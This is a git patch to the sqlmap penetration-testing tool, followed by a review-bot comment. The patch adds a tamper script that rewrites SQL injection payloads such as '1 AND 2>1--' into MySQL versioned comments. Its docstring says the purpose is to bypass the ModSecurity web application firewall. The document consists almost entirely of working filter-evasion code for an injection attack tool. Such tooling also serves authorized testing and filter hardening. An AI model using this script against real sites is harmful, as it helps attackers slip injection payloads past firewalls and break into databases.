From 1cec29925cc6268c0e3613b888ddffc0cf0ed272 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar
Date: Wed, 19 Oct 2011 22:07:23 +0000
Subject: [PATCH] added new tampering script by request
---
tamper/modsecurityversioned.py | 47 ++++++++++++++++++++++++++++++++++
1 file changed, 47 insertions(+)
create mode 100644 tamper/modsecurityversioned.py
diff --git a/tamper/modsecurityversioned.py b/tamper/modsecurityversioned.py
new file mode 100644
index 000000000..d0cad407f
--- /dev/null
+++ b/tamper/modsecurityversioned.py
@@ -0,0 +1,47 @@
+#!/usr/bin/env python
+
+"""
+$Id$
+
+Copyright (c) 2006-2011 sqlmap developers (http://www.sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+from lib.core.enums import PRIORITY
+
+__priority__ = PRIORITY.HIGHER
+
+def dependencies():
+ pass
+
+def tamper(payload):
+ """
+ Replaces ...
+
+ Example:
+ * Input: 1 AND 2>1--
+ * Output: 1 /*!30000AND 2>1*/--
+
+ Requirement:
+ * MySQL
+
+ Tested against:
+ * MySQL 5.0
+
+ Notes:
+ * Useful to bypass ModSecurity WAF/IDS
+ """
+
+ retVal = payload
+
+ if payload:
+ postfix = ''
+ for comment in ('#', '--', '/*'):
+ if comment in payload:
+ postfix = payload[payload.find(comment):]
+ payload = payload[:payload.find(comment)]
+ break
+ if ' ' in payload:
+ retVal = "%s /*!30000%s*/%s" % (payload[:payload.find(' ')], payload[payload.find(' ') + 1:], postfix)
+
+ return retVal
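Review bot: The docstring summary in `tamper()` is still the placeholder `Replaces ...`, so the module never states what it rewrites. A summary such as `Wraps everything after the first space of the payload in a MySQL versioned comment (/*!30000 ... */), leaving any trailing comment outside it` would match the visible code. The literal `30000` also deserves a one-line comment: it reads as the MySQL version gate, so a server at or above that version runs the enclosed text as SQL, which is consistent with the `Tested against: MySQL 5.0` entry. That is also why filtering in front of MySQL has to treat the body of `/*!NNNNN ... */` as live SQL rather than as comment text. As a smaller style point, `payload.find(' ')` is evaluated twice on the format line and could be held in a local.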